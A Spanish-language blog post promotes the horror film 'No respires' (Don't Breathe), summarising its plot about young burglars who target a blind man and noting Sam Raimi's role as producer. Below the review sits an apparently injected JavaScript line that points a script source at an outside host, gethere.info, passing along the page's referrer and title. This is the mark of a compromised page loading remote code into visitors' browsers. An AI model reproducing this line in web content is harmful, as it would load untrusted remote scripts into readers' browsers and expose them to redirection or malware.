“No respires”. Una película de los creadores de Evil Dead

Las apariencias engañan…

Qué tal si creas un plan para hacer el gran robo de tu vida, robarle a un ciego todo lo que tiene y escaparte sin que nadie lo note, es algo que suena bastante sencillo, ¿no lo creen? Pero a final de cuentas no todo es lo que parece.

De los creadores de Evil Dead, llega a la pantalla grande una película en la que el suspenso y el terror te harán pensar dos veces cuando se te ocurra pasarte de listo con alguien que no tenga las mismas capacidades que cualquier persona normal. La película de “No Respires” @dontbreathe se estrenó el 2 de septiembre, y la verdad promete mucho.
Sam Raimi, el creador de Evil Dead y director de la trilogía de Spiderman se encarga de la producción de este film. Mucho se está comentando en redes sociales y en la página principal de la película, esperando que no nos decepcione, contando una historia que la verdad promete tener un desenlace muy bueno y que no se ha contado antes.

La película nos cuenta la historia de unos jóvenes que tienen en mente realizar un robo muy grande para dejar la vida de rateros atrás y poder seguir adelante con sus vidas. Ellos escogen a un hombre ciego, el cual se rumora que tiene una gran fortuna, armando un plan que suena muy sencillo, pero los papeles se intercambian cuando quieren escapar de la casa y se darán cuenta que están tratando con un psicópata, así es, no respires porque te puede escuchar.
Recordemos que muchas películas de terror y suspenso han tratado de movernos de nuestros asientos con actos y hechos sobrenaturales o supuestos hechos “reales”, aquí podremos ver que suena más real, aunque recordemos que todo es ficción.
No te darán ganas de ganarte la vida de mala forma después de ver esta película, si pensabas en salirte con la tuya piénsalo dos veces.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios